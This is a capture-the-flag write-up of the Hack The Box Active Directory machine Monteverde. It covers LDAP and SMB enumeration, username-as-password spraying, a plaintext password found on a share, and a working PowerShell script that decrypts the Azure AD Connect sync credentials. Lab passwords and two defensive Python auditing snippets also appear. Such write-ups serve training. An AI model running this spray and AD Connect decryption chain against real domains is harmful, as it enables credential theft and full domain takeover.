Recon
An Nmap scan reveals a domain controller for megabank.local, exposing DNS, LDAP and SMB.
└──╼ [★]$ nmap -p- -A 10.129.228.111
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-11 08:36:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49746/tcp open msrpc Microsoft Windows RPC
Host script results:
| smb2-time:
| date: 2025-08-11T08:37:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
We can check whether we can enumerate the domain further, starting with an anonymous LDAP bind.
┌─[eu-dedivip-1]─[10.10.14.49]─[abno525@htb-6owi1lm3xr]─[~/my_data]
└──╼ [★]$ python windapsearch.py -u "" --dc-ip 10.129.228.111
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.228.111
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=MEGABANK,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[*] Bye!
Next we enumerate the users.
└──╼ [★]$ python windapsearch.py -u "" --dc-ip 10.129.228.111 -U --admin-objects
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.228.111
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=MEGABANK,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 10 users:
cn: Guest
cn: AAD_987d7f2f57d2
cn: Mike Hope
userPrincipalName: mhope@MEGABANK.LOCAL
cn: SABatchJobs
userPrincipalName: SABatchJobs@MEGABANK.LOCAL
cn: svc-ata
userPrincipalName: svc-ata@MEGABANK.LOCAL
cn: svc-bexec
userPrincipalName: svc-bexec@MEGABANK.LOCAL
cn: svc-netapp
userPrincipalName: svc-netapp@MEGABANK.LOCAL
cn: Dimitris Galanos
userPrincipalName: dgalanos@MEGABANK.LOCAL
cn: Ray O'Leary
userPrincipalName: roleary@MEGABANK.LOCAL
cn: Sally Morgan
userPrincipalName: smorgan@MEGABANK.LOCAL
[+] Attempting to enumerate all admin (protected) objects
[+] Found 0 Admin Objects:
[*] Bye!
There are two interesting account names: AAD_987d7f2f57d2 and SABatchJobs@MEGABANK.LOCAL. The AAD_ prefix indicates that Azure Active Directory (Connect) is installed, so presumably there is also Remote Management. We check the membership of the Remote Management Users group.
└──╼ [★]$ python windapsearch.py -u "" --dc-ip 10.129.228.111 -U -m "Remote Management Users"
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.228.111
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=MEGABANK,DC=LOCAL
<snip>
[+] Attempting to enumerate full DN for group: Remote Management Users
[+] Using DN: CN=Remote Management Users,CN=Builtin,DC=MEGABANK,DC=LOCAL
[+] Found 1 members:
b'CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL'
We can check whether we can list shares anonymously.
└──╼ [★]$ smbclient -N -L \\\\10.129.228.111\\
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.111 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
We can do further enumeration with enum4linux -A <ip> and confirm that there is no lockout policy.
Domain password information:
Password history length: 24
Minimum password length: 7
Maximum password age: 41 days 23 hours 53 minutes
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
Foothold
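The policy block above is what makes username-as-password spraying viable here: no lockout threshold and no complexity requirement. As an added audit check that is not part of the original writeup, the following Python parses enum4linux-style policy output (the sample text is constructed from the values on this page) and flags those weak settings.

```python
import re

# Constructed sample, shaped like the enum4linux -A output on this page.
SAMPLE_POLICY = """\
Domain password information:
Password history length: 24
Minimum password length: 7
Maximum password age: 41 days 23 hours 53 minutes
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
"""

# Matches "key: value" and "- FLAG: bool" lines alike.
LINE = re.compile(r"^-?\s*([A-Za-z_ ]+?):\s*(.*)$")


def parse_policy(text: str) -> dict:
    """Flatten the policy lines into a dict; section headers (no value
    after the colon) are skipped."""
    policy = {}
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if m and m.group(2).strip():
            policy[m.group(1).strip()] = m.group(2).strip()
    return policy


def audit_policy(policy: dict, min_length: int = 14) -> list:
    """Return the findings a defender would raise from a parsed policy."""
    findings = []
    threshold = policy.get("Lockout threshold", "None")
    # "None" or 0 means unlimited guesses: a spray never locks an account.
    if not threshold.isdigit() or int(threshold) == 0:
        findings.append("no lockout threshold: password spraying is unthrottled")
    if policy.get("DOMAIN_PASSWORD_COMPLEX", "true").lower() == "false":
        findings.append("complexity disabled: username-as-password is accepted")
    length = re.search(r"\d+", policy.get("Minimum password length", "0"))
    if length and int(length.group()) < min_length:
        findings.append(f"minimum password length {length.group()} is below {min_length}")
    return findings
```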
To start spraying, we can get all the users into a file. Then, we can check if anyone uses their username as their password.
└──╼ [★]$ crackmapexec smb 10.129.228.111 -d megabank -u /tmp/users.txt -p /tmp/users.txt
[*] First time use detected
[*] Creating home directory structure
<snip>
[*] Initializing RDP protocol database
[*] Copying default configuration file
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
<snip>
SMB 10.129.228.111 445 MONTEVERDE [+] megabank\SABatchJobs:SABatchJobs
We can check whether we can execute commands on the server. We can't.
smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.129.228.111 -x whoami
We can then check for any interesting files.
└──╼ [★]$ smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.129.228.111 -A '(xlsx|docx|txt|xml)' -R
[+] IP: 10.129.228.111:445 Name: 10.129.228.111
[+] Starting search for files matching '(xlsx|docx|txt|xml)' on share azure_uploads.
[+] Starting search for files matching '(xlsx|docx|txt|xml)' on share IPC$.
[+] Starting search for files matching '(xlsx|docx|txt|xml)' on share NETLOGON.
[+] Starting search for files matching '(xlsx|docx|txt|xml)' on share SYSVOL.
[+] Starting search for files matching '(xlsx|docx|txt|xml)' on share users$.
[+] Match found! Downloading: users$\mhope\azure.xml
└──╼ [★]$ cat 10.129.228.111-users_mhope_azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
We can then check whether mhope uses this password, as he has remote access: evil-winrm -i 10.129.228.111 -u mhope -p '4n0therD4y@n0th3r$'. It works!
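The azure.xml above is PowerShell CliXML (Export-Clixml output): each Obj carries its .NET type names under TN and typed properties under Props, which is how a PSADPasswordCredential ends up on a share in plaintext. The following Python is an added example, not part of the original writeup; it walks CliXML and reports credential-looking properties with the value masked, so a defender can sweep share contents for exported secrets. The sample document is constructed with a placeholder password.

```python
import re
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# Property names that usually hold a secret; KeyId (a GUID) is deliberately excluded.
SECRET_NAME = re.compile(r"password|secret|token|credential|key$", re.I)

# Constructed sample shaped like the azure.xml found on the users$ share.
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">Example-Placeholder-Secret!</S>
</Props>
</Obj>
</Objs>"""


def find_clixml_secrets(xml_text: str) -> list:
    """Return (object type, property name, masked value) for every property
    whose name looks like a credential."""
    # Export-Clixml writes a BOM; drop it if the file was decoded with it present.
    root = ET.fromstring(xml_text.lstrip("\ufeff"))
    hits = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        type_el = obj.find(f"{{{PS_NS}}}TN/{{{PS_NS}}}T")
        type_name = type_el.text if type_el is not None else "unknown"
        props = obj.find(f"{{{PS_NS}}}Props")
        if props is None:
            continue
        for prop in props:  # S, DT, G, ... elements, each with an N attribute
            name = prop.get("N", "")
            if SECRET_NAME.search(name):
                value = prop.text or ""
                masked = value[:2] + "*" * max(len(value) - 2, 0)  # never echo the secret
                hits.append((type_name, name, masked))
    return hits
```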
Priv esc
First we can check what is installed on the server.
*Evil-WinRM* PS C:\Users\mhope\Desktop> cd "C:\Program Files"
*Evil-WinRM* PS C:\Program Files> ls
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 9:36 PM Common Files
d----- 1/2/2020 2:46 PM internet explorer
d----- 1/2/2020 2:38 PM Microsoft Analysis Services
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync
d----- 1/2/2020 2:38 PM Microsoft SQL Server
d----- 1/2/2020 2:25 PM Microsoft Visual Studio 10.0
d----- 1/2/2020 2:32 PM Microsoft.NET
d----- 1/3/2020 5:28 AM PackageManagement
d----- 1/2/2020 9:37 PM VMware
d-r--- 1/2/2020 2:46 PM Windows Defender
d----- 1/2/2020 2:46 PM Windows Defender Advanced Threat Protection
d----- 9/15/2018 12:19 AM Windows Mail
d----- 1/2/2020 2:46 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 1/2/2020 2:46 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 1/3/2020 5:28 AM WindowsPowerShell
The usual enumeration tools are blocked by restricted access.
*Evil-WinRM* PS C:\Program Files> wmic.exe service get name
WMIC.exe : ERROR:
+ CategoryInfo : NotSpecified: (ERROR::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Description = Access denied
*Evil-WinRM* PS C:\Program Files> sc.exe query state= all
[SC] OpenSCManager FAILED 5:
Access is denied.
*Evil-WinRM* PS C:\Program Files> net.exe start
net.exe : System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Access is denied.
We can, however, continue enumerating ADSync, the synchronization service used by Azure AD Connect, and find its version.
*Evil-WinRM* PS C:\Program Files> Get-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\ADSync
Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Name Property
---- --------
ADSync Type : 16
Start : 2
ErrorControl : 1
ImagePath : "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe"
DisplayName : Microsoft Azure AD Sync
DependOnService : {winmgmt}
ObjectName : MEGABANK\AAD_987d7f2f57d2
Description : Enables integration and management of identity information across multiple directories, systems and platforms. If this service is stopped or disabled, no synchronization or password management for objects in connected data sources will be performed.
FailureActions : {0, 0, 0, 0...}
DelayedAutostart : 1
We can then get the version of the binary.
*Evil-WinRM* PS C:\Program Files> Get-ItemProperty -Path "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe" | Format-list -Property * -Force
PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe
PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\Microsoft Azure AD Sync\Bin
PSChildName : miiserver.exe
PSDrive : C
PSProvider : Microsoft.PowerShell.Core\FileSystem
Mode : -a----
VersionInfo : File: C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe
InternalName: miiserver
OriginalFilename: miiserver.exe
FileVersion: 1.1.882.0
FileDescription: AD-IAM-HybridSync master (0eb4240d4) Azure AD Connect synchronization service.
Product: Microsoft® Azure® AD Connect
ProductVersion: 1.1.882.0
Querying the ADSync database gives the instance_id, keyset_id and entropy values that the extraction script below needs to load the key set.
sqlcmd -S MONTEVERDE -Q "use ADsync; select instance_id,keyset_id,entropy from mms_server_configuration"
Function Get-ADConnectPassword{
    Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"
    # Key set identifiers taken from mms_server_configuration (see the sqlcmd query above)
    $key_id = 1
    $instance_id = [GUID]"1852B527-DD4F-4ECF-B541-EFCCBFF29E31"
    $entropy = [GUID]"194EC2FC-F186-46CF-B44D-071EB61F49CD"
    # Connect to the local ADSync database with the current user's Windows credentials
    $client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList "Server=MONTEVERDE;Database=ADSync;Trusted_Connection=true"
    $client.Open()
    $cmd = $client.CreateCommand()
    $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
    $reader = $cmd.ExecuteReader()
    $reader.Read() | Out-Null
    $config = $reader.GetString(0)
    $crypted = $reader.GetString(1)
    $reader.Close()
    # Use AD Connect's own key manager (mcrypt.dll) to load the key set and decrypt the configuration
    Add-Type -Path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
    $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
    $km.LoadKeySet($entropy, $instance_id, $key_id)
    $key = $null
    $km.GetActiveCredentialKey([ref]$key)
    $key2 = $null
    $km.GetKey(1, [ref]$key2)
    $decrypted = $null
    $key2.DecryptBase64ToString($crypted, [ref]$decrypted)
    # Pull the connector account details out of the plaintext and decrypted XML
    $domain = Select-Xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | Select-Object @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
    $username = Select-Xml -Content $config -XPath "//parameter[@name='forest-login-user']" | Select-Object @{Name = 'Username'; Expression = {$_.node.InnerXML}}
    $password = Select-Xml -Content $decrypted -XPath "//attribute" | Select-Object @{Name = 'Password'; Expression = {$_.node.InnerXML}}
    Write-Host ("Domain: " + $domain.Domain)
    Write-Host ("Username: " + $username.Username)
    Write-Host ("Password: " + $password.Password)
}
We connect with evil-winrm's -s (script directory) option pointing at the folder holding the script, then load it and call the function inside the session.
evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$' -s .
adconnect.ps1
Get-ADConnectPassword
The recovered credentials belong to the domain administrator.
evil-winrm -i 10.10.10.172 -u administrator -p 'd0m@in4dminyeah!'